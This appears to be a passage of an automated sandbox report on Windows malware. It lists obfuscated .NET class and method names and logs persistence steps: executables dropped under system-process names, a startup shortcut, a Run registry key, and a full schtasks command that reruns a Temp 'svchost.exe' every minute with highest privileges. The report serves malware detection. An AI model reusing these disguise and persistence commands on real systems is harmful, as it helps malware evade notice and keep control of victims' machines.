                            Source: StartMenuExperienceHost.exe.4.dr, 2ZsuPbqCBQvbqJJvnkg9IdlWfbr0LmDXH0wXVeMuDAdpKCo8t7EgBvOlnRI4Spu7Koww44lw.csHigh entropy of concatenated method names: 'OBy0ZRAIl27FCEGiYcN9v20B0ApQ6svlHIBlVvq7GViELUIicS9JbY2KMhq58KS9Knd8QBm8', 'vW3Z6eetIFV12B3ix3zdScvW81U6867oGrNe5wk2zZIiVJpIgd0gNvOZvz5vc5nkoDupLdG7', 'AfmZWlx8we4jinH1fpygtayywMwVfzIlMlUkX2BWNgIggiHReOyZCL6zks0UqQOiDCp0DRkI', 'a6IeH8rYFq5qZ30UJiPfTxhDwk66gTOJDXy1aK69WuyJ5hrDX52lC233ac3SOAsBs5g40You', 'CK0cM9yaSZQZ7inxdCslngKIXOLY9Et7yOmvKcyz2q9Wnbk7ZP2yJtQqacaPMLRTvUR0xOv5', 'mhzDKktfAFZgNabYnqjDgO0cu8f6bsRW9Jj6QRvG8K2ls65zW5v9MOb72oauprJMj9Gd4A84', 'CjEQcs6fYlnaFXk0b70e9C47jALT8MEiWlYjpuH9xOvSnYuWuewRnrpWUtSxBQObqChDzpAl', 'ycr9eocoI9ydvfkVn6vo1JrLKfJrUZupOceBW2NqwfXuCZokg05vIMiQuVvyjpRR0fSkWERq', 'klc47EgajQ5XpcbHKWaHrsg8gMtxxevNa6VI6lKeWZaWzl3IR9xs5BUHO7epHk3p4ulIgkz9', 'uX324uFDfb1twezydRxB4KiQLijU68Yegli535SbeNvVPGE7Xp5fffHy8gP84lIHUygonIVm'
                            Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.csHigh entropy of concatenated method names: 'GvngXKg6lLmy5vBBHSIzLkyqFBS6K9rdghWoJ7tDAXccsi5qovHalv8i7XgquXawMbM1XU9l', 'CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT', 'JXsDlFCsoB8yBkNQYyxgMmj4evDB48lW49wM1d961DQ9pcCWsGJkVCfTIart3WCT8opHL9uO', '_0vFa2dvnZUAKRVobWqAPtd0ly2YwziIbyyB0PzJ6fbIZPMhwRabsAfUKxjEBN4MGScvTHloB', '_8KUyxFtwan6UXk4kxwDH1xBAWmZc5UKkz4dvjelYE5TcImdSrKy13wRisPMNEr3L4aPBglyq', 'c8FaDnpWxHYsYI1B2daqv7tsym5SfFGRdcBU5yqFDFGueYlDC8PN3nnkqprMYkHLdPSh9mdX', 'VizLtxeppd42kEqbbvfx4oohKXA4LvFFjm0at7tlVraTFTOW1gBDSuVwE46rD5txVKdyT0dY', 'YWKd05bA2ZBL4jKDtELGLuGXpd4MlJ7PAij6Vk0WVLCm61Yja0VeokNUy12ckNEmsINakcdE', 'lMluw0ZsmqwdPD3wI8oYS2YDmg29UpJctqjvby0Di97UuxjK6w7f9BIDryX8Qvs5kMATj3lj', '_2gmJrYMIeqZZvfYyKnN6sXqTyj34Q0QLieSDM4TpwsCtPS9le2aXAgPtdMdXTlfcjOpNyawl'
                            Source: StartMenuExperienceHost.exe.4.dr, CQg6RO8lWJcEYht.csHigh entropy of concatenated method names: 'Oo2VpJ8DA9dfSFJ', 'TdMOqWUpSawR8y67wO4vBTN7LteXwycr', 'qcowZOmbo9NRKRXvG7K0zCJX9Q8i4A5x', 'RE5foa9s72iXmDoDRb1bl6pa7n5TBJIF', 'mGiE2pwrLOyOjbM6DrU658lmrGzuSbMm'
                            Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.csHigh entropy of concatenated method names: 'baNNnFSKLXWA2Vp', 'TmugH64xJCiIMPp', 'KZTeDrkeZn9BeSf', 'vI6F9EiF4ibw3FL', 'uTHL0d6K4N56D43', '_92fzp0lF8SeY0E2', '_7RfOR0iXoxN4vU0', 'VFBbV1GiS4LQYTR', 'B9j38p5xby1352z', 'cQhKayGAR9Fenqg'
                            Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.csHigh entropy of concatenated method names: 'kgZC0xlCkJHHvkk7kg8bpMGjU3Pib4N60QrK0gdb', '_6OORxCIRtmjnnts0LQZCrfz6gCGkOEFWGy2YGy29', '_8qL3IO7vaZbJ9xmA4UmVVNVxn0vbUiEXJkpv53JX', 'M9hJnsyccWtdo6Vy1EEAHfojlM2H0Yj3L1M9lIaS', 'Ks8Hu8iWSZ2Q1AtCF15qJz5FzJ0hN0HuhnDHgYCh', 'kiczvmGtaXkejXlQnRNyqUZhu1JTZXDnPndslR35', 'JpSkYAfaZhVhp6yTUEUEFdTOaSwALU95Jox0fSyi', 'w0JnMFB1e7LCKlTka0EshC4imbiB3iaHKIp8oSde', 'kgONNwqduucn7ErvHGUsGLHTXff3wXZ0f0PaHxQi', 'eL0TZe4MYmBtdnGq5xTBAu9HxwDnN33uFE4oS2IW'
                            Source: svchost.exe.12.dr, YuWwnU774i1WXQz.csHigh entropy of concatenated method names: 'zoPwAT5CIxrIHgi', 'FKGpPlnraXbM1ZF', 'jXiKhZ2WRX9rqip', '_4YgkMx1W2VQBhkBo9H', 'Mtx16zRUzpofifFREl', 'vftrbwcfQzEo1ZL9A3', '_7PBY7FZQF55DjK1Cov', 'TLX2HhdljB2mEAtMSY', 'MIewFAlfiNh37TUukE', 'VlvzphW9ZDbWXg1odi'
                            Source: svchost.exe.12.dr, BYZXqCcInfvLxkJ.csHigh entropy of concatenated method names: 'HmYB37sUGn1tzWo', 'SwJtMaiww3xwhlt', '_2Ncrum7fWL0LZSI3UTXJdSgAbrxu50NP', 'KJck06XP8a2RC4x3RbNNtnEWeVWVU5RK', 'o2ayMkAsm2MJl7DzCGVCewxkkEXGw9pv', 'XsgoBl2zFUtxhxO7iFYbTblPAMzBMdo8'
                            Source: svchost.exe.12.dr, vxw6fPaLgCWKUy0.csHigh entropy of concatenated method names: 'bsRhaVEy8neLH0G', 'gQeMuKYZfmdfalx', 'a8ZGWF4Ze61pADc', 'BPZ5AL5H8T2eyhW', 'cIvhfw92JPAMmOxZlGFpa6dJWdcGwybE', 'xp2ouzuaCyVa0e3eVHsOzzb0qWY8YtLE', 'ESgVaOnZruQgSXv7dUJbyII9HmUzzpcM', 'lmYfT7g04ToPYZcDY8skWi5KCol1VIKc', 'AfqADcwUoxdRdfpzT2f6Gr6do4dtwHRR', 'WWL0XENC3bSs0kDawIY7qmuVJ47WHNcZ'
                            Source: svchost.exe.12.dr, 4YsgSk8wbMoiiRy.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'kaAfXKhhGgwVbpY', 'ZuyftoEJOIUteV19hRJzXvsttxsbIVQE', 'FXMAjIdHzuejPKublxja7znJenaoewZ4', 'THmHOhpw81AE8MOOZCRn7a0aYF6RPxJZ', 'PEC4vmGtLYWCB1RoZF9K5OzyWH2kigrV'
                            Source: svchost.exe.12.dr, RGgnftDWPPpsIjGTcvO1OpP8vWPkDEV58d5cxkAlUabCGJ3GABiiQ81jRyxmvPvrtAm4lXCj.csHigh entropy of concatenated method names: 'ORiC8emOPRQGOXpPv83ulthuW6CVQ6YM4xTAjZ2jPRAoP9wiEOfLSrtcMcVNycVBuUDSk2rB', 'AceLNnYLfssv5xNkhIBxOpI2MxBiQXzE', 'krotEk14oyz0ZE7dRR97UUit8vJqRAkB', 'kRUj6xBlZyurP2lRnqqZjyfmGywk0gbR', 'xsPGLSQ1yo77J0S7jujyES9FLI86EBg1'
                            Source: svchost.exe.12.dr, XqLRt2iKMxTUA2h4rXCpIUvAUqRYRR5QrACB1BMG.csHigh entropy of concatenated method names: 'l6xBdqb0bhFOmil6dHylKViFfsdgGKvRJk6esdwo', 'SNU29fbBoCjckaVAB9UgMQV0JgKVgsN6yzd6huJ3', 'qc88vInX2XwZwshFbCgXe3OVAw7r9h3qu6VvVOyz', 'Vlcok3h04GLc88cDOnru26nx5ciYbJJaxeObu95U', '_7fyohtCQd9HltSGvlCh4tY4hXjO9K4W56xjZOh0y', 'FYvEJEAauCvrzK4SAEAXEftUcg1Y3DLHHy84Q6E4', 'P8qnLG95P6quuFElwnzpmvpx1UFiMYwaN0X3Tl5f', 'TdTY4rZk0TCcYFml7X4XfCA4ztEWOTb43FyTMja1', 'Qq5pVkiqLGsEZ5anpF0Ym6XKaLY63thUytWoxwSR', 'Jfmk5g6q8jjPsHj0gP4kKAcor9y15M3BKKlOda82'
                            Source: svchost.exe.12.dr, 2ZsuPbqCBQvbqJJvnkg9IdlWfbr0LmDXH0wXVeMuDAdpKCo8t7EgBvOlnRI4Spu7Koww44lw.csHigh entropy of concatenated method names: 'OBy0ZRAIl27FCEGiYcN9v20B0ApQ6svlHIBlVvq7GViELUIicS9JbY2KMhq58KS9Knd8QBm8', 'vW3Z6eetIFV12B3ix3zdScvW81U6867oGrNe5wk2zZIiVJpIgd0gNvOZvz5vc5nkoDupLdG7', 'AfmZWlx8we4jinH1fpygtayywMwVfzIlMlUkX2BWNgIggiHReOyZCL6zks0UqQOiDCp0DRkI', 'a6IeH8rYFq5qZ30UJiPfTxhDwk66gTOJDXy1aK69WuyJ5hrDX52lC233ac3SOAsBs5g40You', 'CK0cM9yaSZQZ7inxdCslngKIXOLY9Et7yOmvKcyz2q9Wnbk7ZP2yJtQqacaPMLRTvUR0xOv5', 'mhzDKktfAFZgNabYnqjDgO0cu8f6bsRW9Jj6QRvG8K2ls65zW5v9MOb72oauprJMj9Gd4A84', 'CjEQcs6fYlnaFXk0b70e9C47jALT8MEiWlYjpuH9xOvSnYuWuewRnrpWUtSxBQObqChDzpAl', 'ycr9eocoI9ydvfkVn6vo1JrLKfJrUZupOceBW2NqwfXuCZokg05vIMiQuVvyjpRR0fSkWERq', 'klc47EgajQ5XpcbHKWaHrsg8gMtxxevNa6VI6lKeWZaWzl3IR9xs5BUHO7epHk3p4ulIgkz9', 'uX324uFDfb1twezydRxB4KiQLijU68Yegli535SbeNvVPGE7Xp5fffHy8gP84lIHUygonIVm'
                            Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.csHigh entropy of concatenated method names: 'GvngXKg6lLmy5vBBHSIzLkyqFBS6K9rdghWoJ7tDAXccsi5qovHalv8i7XgquXawMbM1XU9l', 'CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT', 'JXsDlFCsoB8yBkNQYyxgMmj4evDB48lW49wM1d961DQ9pcCWsGJkVCfTIart3WCT8opHL9uO', '_0vFa2dvnZUAKRVobWqAPtd0ly2YwziIbyyB0PzJ6fbIZPMhwRabsAfUKxjEBN4MGScvTHloB', '_8KUyxFtwan6UXk4kxwDH1xBAWmZc5UKkz4dvjelYE5TcImdSrKy13wRisPMNEr3L4aPBglyq', 'c8FaDnpWxHYsYI1B2daqv7tsym5SfFGRdcBU5yqFDFGueYlDC8PN3nnkqprMYkHLdPSh9mdX', 'VizLtxeppd42kEqbbvfx4oohKXA4LvFFjm0at7tlVraTFTOW1gBDSuVwE46rD5txVKdyT0dY', 'YWKd05bA2ZBL4jKDtELGLuGXpd4MlJ7PAij6Vk0WVLCm61Yja0VeokNUy12ckNEmsINakcdE', 'lMluw0ZsmqwdPD3wI8oYS2YDmg29UpJctqjvby0Di97UuxjK6w7f9BIDryX8Qvs5kMATj3lj', '_2gmJrYMIeqZZvfYyKnN6sXqTyj34Q0QLieSDM4TpwsCtPS9le2aXAgPtdMdXTlfcjOpNyawl'
                            Source: svchost.exe.12.dr, CQg6RO8lWJcEYht.csHigh entropy of concatenated method names: 'Oo2VpJ8DA9dfSFJ', 'TdMOqWUpSawR8y67wO4vBTN7LteXwycr', 'qcowZOmbo9NRKRXvG7K0zCJX9Q8i4A5x', 'RE5foa9s72iXmDoDRb1bl6pa7n5TBJIF', 'mGiE2pwrLOyOjbM6DrU658lmrGzuSbMm'
                            Source: svchost.exe.12.dr, k7DEUthG3QSrccC.csHigh entropy of concatenated method names: 'baNNnFSKLXWA2Vp', 'TmugH64xJCiIMPp', 'KZTeDrkeZn9BeSf', 'vI6F9EiF4ibw3FL', 'uTHL0d6K4N56D43', '_92fzp0lF8SeY0E2', '_7RfOR0iXoxN4vU0', 'VFBbV1GiS4LQYTR', 'B9j38p5xby1352z', 'cQhKayGAR9Fenqg'
                            Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.csHigh entropy of concatenated method names: 'kgZC0xlCkJHHvkk7kg8bpMGjU3Pib4N60QrK0gdb', '_6OORxCIRtmjnnts0LQZCrfz6gCGkOEFWGy2YGy29', '_8qL3IO7vaZbJ9xmA4UmVVNVxn0vbUiEXJkpv53JX', 'M9hJnsyccWtdo6Vy1EEAHfojlM2H0Yj3L1M9lIaS', 'Ks8Hu8iWSZ2Q1AtCF15qJz5FzJ0hN0HuhnDHgYCh', 'kiczvmGtaXkejXlQnRNyqUZhu1JTZXDnPndslR35', 'JpSkYAfaZhVhp6yTUEUEFdTOaSwALU95Jox0fSyi', 'w0JnMFB1e7LCKlTka0EshC4imbiB3iaHKIp8oSde', 'kgONNwqduucn7ErvHGUsGLHTXff3wXZ0f0PaHxQi', 'eL0TZe4MYmBtdnGq5xTBAu9HxwDnN33uFE4oS2IW'

                            Persistence and Installation Behavior

                            barindex
                            Drops PE files with benign system names
                            Source: C:\Windows\StartMenuExperienceHost.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
                            Drops executables to the windows directory (C:\Windows) and starts them
                            Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\StartMenuExperienceHost.exeJump to behavior
                            Source: C:\Windows\System32\curl.exeFile created: C:\Windows\StartMenuExperienceHost.exeJump to dropped file
                            Source: C:\Windows\StartMenuExperienceHost.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
                            Source: C:\Windows\System32\curl.exeFile created: C:\Windows\StartMenuExperienceHost.exeJump to dropped file

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                            Source: C:\Windows\StartMenuExperienceHost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                            Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
